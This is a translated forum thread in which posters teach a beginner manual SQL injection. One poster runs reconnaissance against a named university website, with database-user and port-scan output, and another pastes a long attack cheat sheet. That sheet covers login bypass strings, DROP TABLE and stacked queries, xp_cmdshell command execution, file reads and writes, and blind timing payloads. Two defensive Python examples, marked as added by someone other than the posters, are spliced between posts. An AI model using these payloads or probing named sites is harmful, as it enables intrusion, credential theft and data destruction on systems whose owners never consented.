http://idgs.in/195274

  #16
    Join Date: May 2008 | Location: /proc/sys/kernel/randomize_va_space | Posts: 875

    Quote Originally Posted by New_Dudutz View Post
    Hmm, I don't quite get it, bro bl00d13z,

    for example
    Code:
    UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMISAH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAMA_TABLE
    what is that for? Is that SQL code? I'm a bit confused looking for the code to link one page to another page......... @_@ ......
    This code format:
    Code:
    UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMISAH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAMA_TABLE
    is obtained after we know the number of columns, the table name, and the column names..
    It's an SQL query.. Once we put a single quote ( ' ) into a numeric path, e.g. ?id=12 at the end of the URL, and the server responds with an error.. that's the sign that the path/module has an SQL injection vulnerability (read: weakness) on that site.. the rest we can exploit using step-by-step queries which in the end can uncover the username & password hash of the site's admin..
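To show the defender's side of the single-quote test described above, here is an added example (not from the thread): a query built by string concatenation next to one that validates and binds the id. An in-memory SQLite table stands in for the site's MySQL news table; the table, its rows and the function names are all constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's news table (SQLite, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(12, "first article"), (13, "second article")])
    return conn


def fetch_unsafe(conn, raw_id):
    """Vulnerable pattern: the raw ?id= value is pasted into the SQL text.
    A trailing quote breaks the syntax (the error the post treats as the tell),
    and any extra SQL in the value is simply executed."""
    sql = "SELECT id, title FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def fetch_safe(conn, raw_id):
    """Hardened pattern: reject anything that is not an integer, then bind the
    value as a parameter so it can never reach the SQL parser as syntax."""
    if not raw_id.strip().lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    sql = "SELECT id, title FROM news WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def probe(conn, fetch, raw_id):
    """What a tester sees for a given ?id= value: the rows, a database error
    (which leaks that the input reached the SQL parser), or a clean rejection."""
    try:
        return ("ok", fetch(conn, raw_id))
    except sqlite3.Error as exc:
        return ("db_error", str(exc))
    except ValueError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    conn = make_db()
    for value in ("12", "12'", "12 OR 1=1"):
        print(f"{value!r:14} unsafe -> {probe(conn, fetch_unsafe, value)}")
        print(f"{value!r:14} safe   -> {probe(conn, fetch_safe, value)}")
```

The database error for `12'` is exactly the response the post uses as its indicator; the hardened version never produces it, so the probe learns nothing.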

  #17 Trademaks
    Join Date: Oct 2006 | Location: Indonesia | Posts: 1,946

    http://www.fe.trisakti.ac.id/bacaber...ersion,4,5,6/*

    4.0.12-nt
    What next?

  #18
    Join Date: May 2008 | Location: /proc/sys/kernel/randomize_va_space | Posts: 875

    Quote Originally Posted by Trademaks View Post
    Version 4 can't do information_schema, mas... if you want to fuzz and guess with tools.. all I got was this:

    Code:
    [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
    [-] Proxy Not Given
    [+] Gathering MySQL Server Configuration...
            Database: webfe
            User: adminfe@localhost
            Version: 4.0.12-nt
    [+] Beginning table and column fuzzer...
    [+] Number of tables names to be fuzzed: 334
    [+] Number of column names to be fuzzed: 249
    [+] Searching for tables and columns...
    
    [!] Found a table called: news
    
    [+] Now searching for columns inside table "news"
    [!] Found a column called: id
    [!] Found a column called: status
    [-] Done searching inside table "news" for columns!
    
    [!] Found a table called: session
    
    [+] Now searching for columns inside table "session"
    [-] Done searching inside table "session" for columns!
    
    [!] Found a table called: News
    
    [+] Now searching for columns inside table "News"
    [!] Found a column called: id
    [!] Found a column called: status
    [-] Done searching inside table "News" for columns!
    Only the news and session tables on my end.. my fuzz table list hasn't been updated yet..
    Jumping doesn't seem possible on this one either.. it doesn't use virtual hosting.. meanwhile, from the services:
    Code:
    PORT     STATE  SERVICE            VERSION
    21/tcp   open   ftp                Microsoft ftpd 5.0
    23/tcp   closed telnet
    25/tcp   closed smtp
    80/tcp   open   http               Microsoft IIS webserver 5.0
    110/tcp  closed pop3
    443/tcp  open   https?
    3389/tcp open   microsoft-rdp      Microsoft Terminal Service
    4662/tcp closed edonkey
    5900/tcp closed vnc
    6881/tcp closed bittorrent-tracker
    8000/tcp closed http-alt
    8001/tcp closed unknown
    8002/tcp closed unknown
    8007/tcp closed ajp12
    8008/tcp closed unknown
    8009/tcp closed ajp13
    8010/tcp closed unknown
    8011/tcp closed unknown
    8021/tcp closed ftp-proxy
    8022/tcp closed unknown
    Service Info: OS: Windows
    Hahaha, turns out the web server is IIS 5, mas.. there are plenty of exploits for that floating around, I won't discuss it.. it's not an SQLi topic.. it'd be off-topic ^^

  #19 New_Dudutz
    Join Date: Jan 2007 | Location: Earth~ | Posts: 1,178

    Wow, turns out learning this is pretty hard, you really have to understand it.......................... bro bl00di3z, where do you live? If it's close, I want to come and learn....... hahahaha

    Sell Magic Item 100% Low Price High Quality , Not ********, Contact Me
    -dream_heaven4873@yahoo.com / PM

  #20
    Join Date: May 2008 | Location: /proc/sys/kernel/randomize_va_space | Posts: 875

    Quote Originally Posted by New_Dudutz View Post
    Wow, turns out learning this is pretty hard, you really have to understand it.......................... bro bl00di3z, where do you live? If it's close, I want to come and learn....... hahahaha
    >.< I'm from Bandung.., you can learn here too.. has anyone succeeded in learning it yet? The nice thing about doing it manually is that you understand the exploitation flow afterwards, compared to automated tools; and if you're good at SQL queries, the SQLi can be even sweeter.. (honestly I'm clueless when it comes to SQL queries and PHP, basically anything web-related, I only know the basics).. ^^ btw, on this idgs forum there's also a bug that could let all accounts be intercepted (I didn't look into it further) >.< but it's already immune to SQLi here.. ^^ no LFI or RFI either.. they picked their vBulletin version well.. heheh

  #21 New_Dudutz
    Join Date: Jan 2007 | Location: Earth~ | Posts: 1,178

    What confuses me is adding the codes after that link....... a bit confused about what to do with it......

    haha......

    I'm still studying this, keep helping please, teacher bl00d13z.......


  #22
    Join Date: May 2008 | Location: /proc/sys/kernel/randomize_va_space | Posts: 875

    Quote Originally Posted by New_Dudutz View Post
    What confuses me is adding the codes after that link....... a bit confused about what to do with it......

    haha......

    I'm still studying this, keep helping please, teacher bl00d13z.......
    Which target are you on now?.. bah, don't call me teacher.. I can't teach

  #23 New_Dudutz
    Join Date: Jan 2007 | Location: Earth~ | Posts: 1,178

    No target yet, still just studying...........

    What confuses me is what to do after the link gets a single quote ('); it errors, right, so what do I do next? The problem is I still don't really understand the logic of SQLi........

    T_T


  #24
    Join Date: May 2008 | Location: /proc/sys/kernel/randomize_va_space | Posts: 875

    Quote Originally Posted by New_Dudutz View Post
    No target yet, still just studying...........

    What confuses me is what to do after the link gets a single quote ('); it errors, right, so what do I do next? The problem is I still don't really understand the logic of SQLi........

    T_T
    Go straight to finding the columns.. use order+by+num--, starting from
    order+by+1-- and look at the result.. whether the page errors or not, then check
    order+by+2-- and see whether the result is the same as order+by+1--; if it's the same, jump to a somewhat higher number, e.g. order+by+5--; if it turns out to change (e.g. from no error to an error again), step the number back.. to order+by+4-- and look at the result again, error or not; say it still errors, step back again to order+by+3--
    Now say at order+by+3-- there's no error.. (from this I conclude there are 3 columns in the db path you're injecting). Next, give a null/negative value at the start of the id, e.g.:

    ?id=14+order+by+3--

    now try this:

    ?id=-14+union+all+select+1,2,3-- or ?id=null+union+all+select+1,2,3--

    magic numbers will appear on the page.. haha.. then read the tutorial again.. ^^
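As an added defender-side example (not from the thread), the ORDER BY stepping and the `-14+union+all+select` follow-up described above leave a distinctive trail in web server access logs. The log lines below are constructed, the path `/news.php` and the client addresses are placeholders, and the analyser is mine, not a tool the thread mentions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (common log format) reproducing the post's probe
# sequence: order by 1, 2, 5, 4, 3 and then the union select with a negative id.
SAMPLE_LOG = """\
10.0.0.7 - - [13/May/2009:21:02:11 +0700] "GET /news.php?id=14+order+by+1-- HTTP/1.1" 200 5120
10.0.0.7 - - [13/May/2009:21:02:13 +0700] "GET /news.php?id=14+order+by+2-- HTTP/1.1" 200 5120
10.0.0.7 - - [13/May/2009:21:02:15 +0700] "GET /news.php?id=14+order+by+5-- HTTP/1.1" 500 812
10.0.0.7 - - [13/May/2009:21:02:17 +0700] "GET /news.php?id=14+order+by+4-- HTTP/1.1" 500 812
10.0.0.7 - - [13/May/2009:21:02:19 +0700] "GET /news.php?id=14+order+by+3-- HTTP/1.1" 200 5120
10.0.0.7 - - [13/May/2009:21:02:25 +0700] "GET /news.php?id=-14+union+all+select+1,2,3-- HTTP/1.1" 200 4990
192.168.1.20 - - [13/May/2009:21:03:01 +0700] "GET /news.php?id=15 HTTP/1.1" 200 5301
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.IGNORECASE)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)


def classify(path):
    """Decode the request (+ and %xx) and tag it as an ORDER BY probe with its N,
    a UNION SELECT, or None for an ordinary request."""
    decoded = unquote_plus(path)
    m = ORDER_BY_RE.search(decoded)
    if m:
        return ("order_by", int(m.group(1)))
    if UNION_RE.search(decoded):
        return ("union_select", None)
    return None


def analyse(log_text):
    """Group probes per client: the ORDER BY values with their HTTP status (in order),
    the number of UNION SELECT requests, and how many probes caused a server error."""
    findings = defaultdict(lambda: {"order_by": [], "union_select": 0, "errors": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, status, _size = m.groups()
        tag = classify(path)
        if tag is None:
            continue
        rec = findings[ip]
        status = int(status)
        if tag[0] == "order_by":
            rec["order_by"].append((tag[1], status))
        else:
            rec["union_select"] += 1
        if status >= 500:
            rec["errors"] += 1
    return dict(findings)


def inferred_column_count(order_by_probes):
    """The largest ORDER BY N that did not error is what the attacker learned
    (the post's conclusion of 3 columns)."""
    ok = [n for n, status in order_by_probes if status < 400]
    return max(ok) if ok else None


if __name__ == "__main__":
    for ip, rec in analyse(SAMPLE_LOG).items():
        print(ip, rec, "columns learned:", inferred_column_count(rec["order_by"]))
```

A run of `order by N` values from one client followed by a `union select` on the same parameter is a high-confidence signal, and the 500 responses show the application is returning database errors to the client.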

  #25 nveuu
    Join Date: Apr 2007 | Location: di warnet | Posts: 2,496

    Sharing a little, an SQLi sheet...

    Translate it yourself... or if anyone is kind enough to translate it for everyone ^^ I'll give GRP...

    SQL Injection Cheat Sheet

    author : ferruh@mavituna.com

    SQL Injection Cheat Sheet, Document Version 1.4
    About SQL Injection Cheat Sheet

    Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of the samples are not correct for every single situation. Most real world environments may change because of parentheses, different code bases and unexpected, strange SQL sentences.

    Samples are provided to allow the reader to get a basic idea of a potential attack, and almost every section includes brief information about itself.
    M : MySQL
    S : SQL Server
    P : PostgreSQL
    O : Oracle
    + : Possibly all other databases
    Examples;

    * (MS) means : MySQL and SQL Server etc.
    * (M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server


    Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
    Ending / Commenting Out / Line Comments
    Line Comments

    Comments out the rest of the query.
    Line comments are generally useful for ignoring the rest of the query so you don't have to deal with fixing the syntax.

    * -- (SM)
    DROP sampletable;--

    * # (M)
    DROP sampletable;#

    Line Comments Sample SQL Injection Attacks

    * Username: admin'--
    * SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
    This is going to log you in as the admin user, because the rest of the SQL query will be ignored.

    Inline Comments

    Comments out the rest of the query by not closing them, or you can use them for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

    * /*Comment Here*/ (SM)
    o DROP/*comment*/sampletable
    o DR/**/OP/*bypass blacklisting*/sampletable
    o SELECT/*avoid-spaces*/password/**/FROM/**/Members

    * /*! MYSQL Special SQL */ (M)
    This is a special comment syntax for MySQL. It's perfect for detecting the MySQL version. If you put code into these comments it's going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than the supplied version.

    SELECT /*!32302 1/0, */ 1 FROM tablename

    Classical Inline Comment SQL Injection Attack Samples

    * ID: 10; DROP TABLE members /*
    Simply gets rid of the other stuff at the end of the query. Same as 10; DROP TABLE members --

    * SELECT /*!32302 1/0, */ 1 FROM tablename
    Will throw a division by 0 error if the MySQL version is higher than 3.23.02

    MySQL Version Detection Sample Attacks

    * ID: /*!32302 10*/
    * ID: 10
    You will get the same response if the MySQL version is higher than 3.23.02

    * SELECT /*!32302 1/0, */ 1 FROM tablename
    Will throw a division by 0 error if the MySQL version is higher than 3.23.02

    Stacking Queries

    Executing more than one query in one transaction. This is very useful at every injection point, especially in SQL Server back-ended applications.

    * ; (S)
    SELECT * FROM members; DROP members--

    Ends a query and starts a new one.
    Language / Database Stacked Query Support Table

                 SQL Server   MySQL           PostgreSQL   ORACLE          MS Access
    ASP          supported    unknown         unknown      unknown         not supported
    ASP.NET      supported    unknown         unknown      unknown         not supported
    PHP          supported    not supported   supported    unknown         not supported
    Java         unknown      unknown         unknown      not supported   not supported

    About MySQL and PHP;
    To clarify some issues:
    PHP - MySQL doesn't support stacked queries, Java doesn't support stacked queries (I'm sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries, but because of the database layer in most configurations it's not possible to execute a second query in PHP-MySQL applications, or maybe the MySQL client supports this, not quite sure. Can someone clarify?
    Stacked SQL Injection Attack Samples

    * ID: 10;DROP members --
    * SELECT * FROM products WHERE id = 10; DROP members--

    This will run the DROP members SQL sentence after the normal SQL query.
    If Statements

    Get a response based on an if statement. This is one of the key points of Blind SQL Injection; it can also be very useful to test simple stuff blindly and accurately.
    MySQL If Statement

    * IF(condition,true-part,false-part) (M)
    SELECT IF(1=1,'true','false')

    SQL Server If Statement

    * IF condition true-part ELSE false-part (S)
    IF (1=1) SELECT 'true' ELSE SELECT 'false'

    If Statement SQL Injection Attack Samples

    if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
    This will throw a divide by zero error if the currently logged-in user is not "sa" or "dbo".
    Using Integers

    Very useful for bypassing magic_quotes() and similar filters, or even WAFs.

    * 0xHEXNUMBER (SM)
    You can write hex like this:

    SELECT CHAR(0x66) (S)
    SELECT 0x5045 (this is not an integer it will be a string from Hex) (M)
    SELECT 0x50 + 0x45 (this is integer now!) (M)

    String Operations

    String related operations. These can be quite useful to build up injections which don't use any quotes, to bypass other blacklisting, or to determine the back end database.
    String Concatenation

    * + (S)
    SELECT login + '-' + password FROM members

    * || (*MO)
    SELECT login || '-' || password FROM members

    *About MySQL "||";
    If MySQL is running in ANSI mode it's going to work, but otherwise MySQL accepts it as a logical operator and it'll return 0. A better way to do it is using the CONCAT() function in MySQL.

    * CONCAT(str1, str2, str3, ...) (M)
    Concatenate supplied strings.
    SELECT CONCAT(login, password) FROM members

    Strings without Quotes

    These are some direct ways of using strings, but it's always possible to use CHAR() (MS) and CONCAT() (M) to generate strings without quotes.

    * 0x457578 (M) - Hex Representation of string
    SELECT 0x457578
    This will be selected as string in MySQL.

    In MySQL, an easy way to generate hex representations of strings is this:
    SELECT CONCAT('0x',HEX('c:\\boot.ini'))

    * Using CONCAT() in MySQL
    SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
    This will return ‘KLM’.

    * SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
    This will return ‘KLM’.

    Hex based SQL Injection Samples

    * SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
    This will show the content of c:\boot.ini

    String Modification & Related

    * ASCII() (SMP)
    Returns the ASCII character value of the leftmost character. A must-have function for Blind SQL Injections.

    SELECT ASCII('a')

    * CHAR() (SM)
    Converts an ASCII integer value to a character.

    SELECT CHAR(64)

    Union Injections

    With union you do SQL queries cross-table. Basically you can poison the query to return records from another table.

    SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
    This will combine results from both the news table and the members table and return all of them.

    Another Example :
    ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
    UNION – Fixing Language Issues

    While exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.); these functions are quite useful to fix this problem. It's rare, but if you're dealing with Japanese, Russian, Turkish etc. applications then you will see it.

    * SQL Server (S)
    Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.

    SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members

    * MySQL (M)
    Hex() for every possible issue

    Bypassing Login Screens (SMO+)
    SQL Injection 101, Login tricks

    * admin' --
    * admin' #
    * admin'/*
    * ' or 1=1--
    * ' or 1=1#
    * ' or 1=1/*
    * ') or '1'='1--
    * ') or ('1'='1--
    * ....

    * Login as different user (SM*)
    ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

    *Old versions of MySQL don't support union queries
    Bypassing second MD5 hash check login screens

    If the application first gets the record by username and then compares the returned MD5 with the supplied password's MD5, then you need some extra tricks to fool the application and bypass authentication. You can union the results with a known password and the MD5 hash of the supplied password. In this case the application will compare your password and your supplied MD5 hash instead of the MD5 from the database.
    Bypassing MD5 Hash Check Example (MSP)

    Username : admin
    Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

    81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

    Error Based - Find Columns Names
    Finding Column Names with HAVING BY - Error Based (S)

    In the same order,

    * ' HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1 HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
    * If you are not getting any more errors then it's done.

    Finding how many columns in SELECT query by ORDER BY (MSO+)

    Finding column number by ORDER BY can speed up the UNION SQL Injection process.

    * ORDER BY 1--
    * ORDER BY 2--
    * ORDER BY N-- so on
    * Keep going until you get an error. An error means you found the number of selected columns.

    Data types, UNION, etc.
    Hints,

    * Always use UNION with ALL because of image and similar non-distinct field types. By default union tries to get records with DISTINCT.
    * To get rid of unrequired records from the left table use -1 or any non-existent record search at the beginning of the query (if the injection is in WHERE). This can be critical if you are only getting one result at a time.
    * Use NULL in UNION injections for most data types instead of trying to guess string, date, integer etc.
    o Be careful in blind situations so you can tell whether the error is coming from the DB or the application itself, because languages like ASP.NET generally throw errors while trying to use NULL values (because normally developers are not expecting to see NULL in a username field)

    Finding Column Type

    * ' union select sum(columntofind) from users-- (S)
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

    If you are not getting an error it means the column is numeric.

    * Also you can use CAST() or CONVERT()
    o SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

    * 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --
    No Error - Syntax is right. MS SQL Server Used. Proceeding.

    * 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 --
    No Error – First column is an integer.

    * 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
    Error! – Second column is not an integer.

    * 11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 --
    No Error – Second column is a string.

    * 11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 --
    Error! – Third column is not an integer. ...

    Microsoft OLE DB Provider for SQL Server error '80040e07'
    Explicit conversion from data type int to image is not allowed.

    You'll get convert() errors before union target errors! So start with convert(), then union.
    Simple Insert (MSO+)
    '; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
    Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes

    @@version (MS)
    Version of the database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply a table name. Also you can use it in insert and update statements or in functions.

    INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
    Bulk Insert (S)

    Inserts a file's content into a table. If you don't know the internal path of the web application you can read the IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify the application path.

    1. Create table foo( line varchar(8000) )
    2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
    3. Drop temp table, and repeat for another file.

    BCP (S)

    Writes a text file. Login credentials are required to use this function.
    bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
    VBS, WSH in SQL Server (S)

    You can use VBS, WSH scripting in SQL Server because of ActiveX support.

    declare @o int
    exec sp_oacreate 'wscript.shell', @o out
    exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
    Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
    Executing system commands, xp_cmdshell (S)

    Well-known trick. By default it's disabled in SQL Server 2005. You need to have admin access.

    EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

    Simple ping check (configure your firewall or sniffer to identify the request before launching it),

    EXEC master.dbo.xp_cmdshell 'ping <ip address>'

    You cannot read results directly from errors, unions or anything else.
    Some Special Tables in SQL Server (S)

    * Error Messages
    master..sysmessages

    * Linked Servers
    master..sysservers

    * Password (2000 and 2005 are both crackable, they use a very similar hashing algorithm)
    SQL Server 2000: master..sysxlogins
    SQL Server 2005: sys.sql_logins

    More Stored Procedures for SQL Server (S)

    1. Cmd Execute (xp_cmdshell)
    exec master..xp_cmdshell 'dir'

    2. Registry Stuff (xp_regread)
    1. xp_regaddmultistring
    2. xp_regdeletekey
    3. xp_regdeletevalue
    4. xp_regenumkeys
    5. xp_regenumvalues
    6. xp_regread
    7. xp_regremovemultistring
    8. xp_regwrite
    exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
    exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

    3. Managing Services (xp_servicecontrol)
    4. Medias (xp_availablemedia)
    5. ODBC Resources (xp_enumdsn)
    6. Login mode (xp_loginconfig)
    7. Creating Cab Files (xp_makecab)
    8. Domain Enumeration (xp_ntsec_enumdomains)
    9. Process Killing (need PID) (xp_terminate_process)
    10. Add new procedure (virtually you can execute whatever you want)
    sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
    exec xp_webserver
    11. Write text file to a UNC or an internal path (sp_makewebtask)

    MSSQL Bulk Notes

    SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

    DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0

    HOST_NAME()
    IS_MEMBER (Transact-SQL)
    IS_SRVROLEMEMBER (Transact-SQL)
    OPENDATASOURCE (Transact-SQL)

    INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"

    OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx

    You cannot use sub-selects in SQL Server Insert queries.
    SQL Injection in LIMIT (M) or ORDER (MSO)

    SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

    If the injection is in the second limit you can comment it out or use it in your union injection.
    Shutdown SQL Server (S)

    When you're really pissed off, ';shutdown --
    Enabling xp_cmdshell in SQL Server 2005

    By default xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.

    EXEC sp_configure 'show advanced options',1
    RECONFIGURE

    EXEC sp_configure 'xp_cmdshell',1
    RECONFIGURE
    Finding Database Structure in SQL Server (S)
    Getting User defined Tables

    SELECT name FROM sysobjects WHERE xtype = 'U'
    Getting Column Names

    SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
    Moving records (S)

    * Modify WHERE and use NOT IN or NOT EXISTS,
    ... WHERE users NOT IN ('First User', 'Second User')
    SELECT TOP 1 name FROM members WHERE NOT EXISTS(SELECT TOP 0 name FROM members) -- very good one

    * Using Dirty Tricks
    SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int

    Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21


    Fast way to extract data from Error Based SQL Injections in SQL Server (S)

    ';BEGIN DECLARE @rd varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--


    Blind SQL Injections
    About Blind SQL Injections

    In a quite good production application generally you cannot see error responses on the page, so you cannot extract data through Union attacks or error based attacks. You have to use Blind SQL Injection attacks to extract data. There are two kinds of Blind SQL Injections.

    Normal Blind: you cannot see a response in the page, but you can still determine the result of a query from the response or the HTTP status code.
    Totally Blind: you cannot see any difference in the output of any kind. This can be an injection into a logging function or similar. Not so common though.

    In normal blinds you can use if statements or abuse the WHERE clause of the injected query (generally easier); in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.
    Real and a bit Complex Blind SQL Injection Attack Sample

    This output was taken from a real private Blind SQL Injection tool while exploiting a SQL Server back-ended application and enumerating table names. These requests were done for the first char of the first table name. The SQL queries are a bit more complex than required because of automation reasons. In it we are trying to determine the ASCII value of a char via a binary search algorithm.

    TRUE and FALSE flags mark queries returned true or false.

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--

    Since both of the last 2 queries failed we clearly know the table name's first char's ASCII value is 80, which means the first char is `P`. This is the way to exploit Blind SQL injections by a binary search algorithm. The other well known way is reading data bit by bit. Both can be effective in different conditions.

    Waiting For Blind SQL Injections

    First of all, use this if it's really blind, otherwise just use 1/0 style errors to identify the difference. Second, be careful while using times of more than 20-30 seconds; the database API connection or script can time out.
    WAIT FOR DELAY 'time' (S)

    This is just like sleep, wait for the specified time. A CPU-safe way to make the database wait.

    WAITFOR DELAY '0:0:10'--

    Also you can use fractions like this,

    WAITFOR DELAY '0:0:0.51'
    Real World Samples

    * Are we 'sa' ?
    if (select user) = 'sa' waitfor delay '0:0:10'
    * ProductID = 1;waitfor delay '0:0:10'--
    * ProductID =1);waitfor delay '0:0:10'--
    * ProductID =1';waitfor delay '0:0:10'--
    * ProductID =1');waitfor delay '0:0:10'--
    * ProductID =1));waitfor delay '0:0:10'--
    * ProductID =1'));waitfor delay '0:0:10'--

